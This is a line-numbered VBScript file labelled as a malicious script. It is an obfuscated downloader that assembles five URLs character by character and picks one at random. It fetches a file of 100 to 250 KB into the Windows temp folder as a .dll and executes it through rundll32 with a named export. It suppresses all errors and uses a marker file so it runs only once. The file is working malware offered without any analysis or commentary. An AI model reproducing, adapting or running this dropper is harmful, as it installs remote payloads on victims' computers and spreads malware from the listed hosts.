Malicious script

1. On Error Resume Next
2. Const Jk7 = 1, RYg6 = 2, GEi = 8
3. Const Og = 1, DVe = 2, Jg5 = "437", SJz8 = 2
4. Function DNk(XJw8)
5. Dim LFr, AEd3, HJx
6. Set LFr = CreateObject("ADODB.Stream")
7. LFr.type = DVe
8. LFr.Charset = Jg5
9. LFr.Open
10. LFr.LoadFromFile XJw8
11. HJx = LFr.ReadText
12. LFr.Close
13. DNk = Yj(HJx)
14. End Function
15. Sub CBj(XJw8, ZJe)
16. Dim LFr, HJx
17. Set LFr = CreateObject("ADODB.Stream")
18. LFr.type = DVe
19. LFr.Charset = Jg5
20. LFr.Open
21. HJx = Nj2(ZJe)
22. LFr.WriteText HJx
23. LFr.SaveToFile XJw8, SJz8
24. LFr.Close
25. End Sub
26. Function Bs8(Wk9)
27. Dim HJx, Dd8(0)
28. If Wk9 <= 0 Then
29. Err.Raise 50001, "", "123", "", 0
30. ElseIf Wk9 = 1 Then
31. Bs8 = Dd8
32. Else
33. HJx = Space(Wk9-1)
34. Bs8 = Split(HJx, " ")
35. End If
36. End Function
37. Function Zq6(url)
38. Dim YDh, Bq0, AEd3, Bg
39. Dim OBp, MEk(1)
40. Set YDh = CreateObject("Scripting.FileSystemObject")
41. MEk(0) = "WinHttp.WinHttpRequest.5.1"
42. MEk(1) = "MSXML2.XMLHTTP"
43. For Each OBp in MEk
44. Err.Clear
45. Set Bq0 = CreateObject(OBp)
46. If Err.Number = 0 Then
47. Exit For
48. End If
49. Next
50. Bq0.Open "GET", url, False
51. Bq0.Send
52. AEd3 = Bs8(LenB(Bq0.ResponseBody))
53. For Bg = 1 To LenB(Bq0.ResponseBody)
54. AEd3(Bg-1) = AscB(MidB(Bq0.ResponseBody, Bg, 1))
55. Next
56. Zq6 = AEd3
57. End Function
58. Sub Ye( RFz5, DJc )
59. Dim Bg, Rq5, YDh, Bq0, QPn5
60. Set YDh = CreateObject( "Scripting.FileSystemObject" )
61. If YDh.FolderExists( DJc ) Then
62. QPn5 = YDh.BuildPath( DJc, Mid( RFz5, InStrRev( RFz5, "/" ) + 1 ) )
63. ElseIf YDh.FolderExists( Left( DJc, InStrRev( DJc, "\" ) - 1 ) ) Then
64. QPn5 = DJc
65. Else
66. Exit Sub
67. End If
68. Set Rq5 = YDh.OpenTextFile( QPn5, RYg6, True )
69. Set Bq0 = CreateObject( "WinHttp.WinHttpRequest.5.1" )
70. Bq0.Open "GET", RFz5, False
71. Bq0.Send
72. If LenB(Bq0.ResponseBody) < 100000 Or LenB(Bq0.ResponseBody) > 250000 Then
73. Err.Raise 50011, "", "received shit", "", 0
74. Exit Sub
75. End If
76. For Bg = 1 To LenB( Bq0.ResponseBody )
77. Rq5.Write Chr( AscB( MidB( Bq0.ResponseBody, Bg, 1 ) ) )
78. Next
79. Rq5.Close( )
80. End Sub
81. Function UOh()
82. Dim BRq, TBh, Be6
83. Set BRq = CreateObject("WScript.Shell")
84. Set TBh = BRq.Environment("System")
85. Be6 = TBh("PROCESSOR_ARCHITECTURE")
86. If LCase(Be6) = "amd64" Then
87. UOh = BRq.ExpandEnvironmentStrings("%SystemRoot%\SysWOW64\rundll32.exe")
88. Else
89. UOh = BRq.ExpandEnvironmentStrings("%SystemRoot%\system32\rundll32.exe")
90. End If
91. End Function
92. Sub UYw0(Wi, KBq, Hk4)
93. Dim BRq, YDh, Rq5, WWp, Jx5
94. Set BRq = CreateObject("WScript.Shell")
95. Set YDh = CreateObject("Scripting.FileSystemObject")
96. Set Rq5 = YDh.GetFile(Wi)
97. WWp = Rq5.ShortPath
98. Jx5 = UOh() + " " + WWp + "," + KBq + " " + Hk4
99. If 2 > 1 Then
100. BRq.Run(Jx5)
101. End If
102. End Sub
103. Function Kf7(Wi)
104. Dim YDh
105. Set YDh = CreateObject("Scripting.FileSystemObject")
106. Kf7 = YDh.FileExists(Wi)
107. End Function
108. Function Jq0(Wi)
109. Dim YDh, Rq5
110. Set YDh = CreateObject("Scripting.FileSystemObject")
111. Set Rq5 = YDh.GetFile(Wi)
112. Jq0 = Rq5.ShortPath
113. End Function
114. Function Ev6(Qt, UHs)
115. Dim Wk9
116. Wk9 = CDbl(Int(CDbl(Qt)/CDbl(UHs)))
117. Ev6 = CDbl(Qt) - Wk9 * CDbl(UHs)
118. End Function
119. Function Vp(Gx, HJx)
120. HJx(1) = 172 * HJx(1) Mod 30307
121. HJx(0) = 171 * HJx(0) Mod 30269
122. HJx(2) = 170 * HJx(2) Mod 30323
123. Dim ZWw
124. ZWw = Ev6((CDbl(HJx(0))/30269.0 + CDbl(HJx(1))/30307.0 + CDbl(HJx(2))/30323.0), 1.0)
125. Vp = Int(ZWw * CDbl(Gx))
126. End Function
127. Function Va6(HAq3)
128. Va6 = CInt(HAq3*Rnd())
129. End Function
130. Sub YXi0(Wc7)
131. WScript.Sleep(Wc7)
132. End Sub
133. Randomize
134. Dim EHi(2), EKj9, HZr(4), XJw8
135. EHi(0) = 21898
136. EHi(1) = 24911
137. EHi(2) = 26762
138. EKj9 = 50
139. If 1=1 Then
140. HZr(0) = "ht"&"tp://" & "5" & "1" & "q" & "u" & "d" & "u" & "." & "c" & "o" & "m" & "/" & "m" & "q" & "y" & "2" & "p" & "j" & "4"
141. End If
142. If 1=1 Then
143. HZr(1) = "ht"&"tp://" & "b" & "j" & "z" & "s" & "t" & "." & "c" & "n" & "/" & "q" & "g" & "q" & "4" & "d" & "x"
144. End If
145. If 1=1 Then
146. HZr(2) = "ht"&"tp://" & "d" & "a" & "n" & "a" & "p" & "a" & "r" & "d" & "a" & "z" & "." & "n" & "e" & "t" & "/" & "z" & "r" & "r" & "8" & "r" & "t" & "z"
147. End If
148. If 1=1 Then
149. HZr(3) = "ht"&"tp://" & "l" & "i" & "t" & "c" & "h" & "l" & "o" & "p" & "e" & "r" & "." & "c" & "o" & "m" & "/" & "6" & "6" & "q" & "p" & "o" & "s" & "7" & "m"
150. End If
151. If 1=1 Then
152. HZr(4) = "ht"&"tp://" & "z" & "i" & "z" & "z" & "h" & "a" & "i" & "d" & "a" & "." & "c" & "o" & "m" & "/" & "6" & "z" & "d" & "y" & "9" & "i" & "v" & "o"
153. End If
154. XJw8 = "TOHYDHko8jeC3IES"
155. Dim BRq, Yt1, Vo, Xp1, Wc7
156. Set objShell = CreateObject("WS"&"cript.Shell")
157. Yt1 = objShell.ExpandEnvironmentStrings("%" & "T"&"EMP%")
158. Dim CTu, Wf, YSj, ZVv6, Bg
159. Wf = False
160. For Bg=0 To 10: Do
161. Vo = Yt1 + "\" + XJw8 + Chr(48+Bg) + ".dl"&"l"
162. If Kf7(Vo) Then
163. Xp1 = Jq0(Vo) & ".txt"
164. If Kf7(Xp1) Then
165. WScript.Quit(0)
166. End If
167. End If
168. If Not Wf Then
169. CTu = Va6(UBound(HZr))
170. Ye HZr(CTu), Vo
171. If Err.Number <> 0 Then
172. Exit Do
173. End If
174. Wf = True
175. End If
176. UYw0 Vo, "A"&"d"&"vancedStoragePasswordConfig", "1"&"47"
177. WScript.Quit(1)
178. Loop While False: Next
179. If 3=3 Then
180. WScript.Quit(1)
181. End If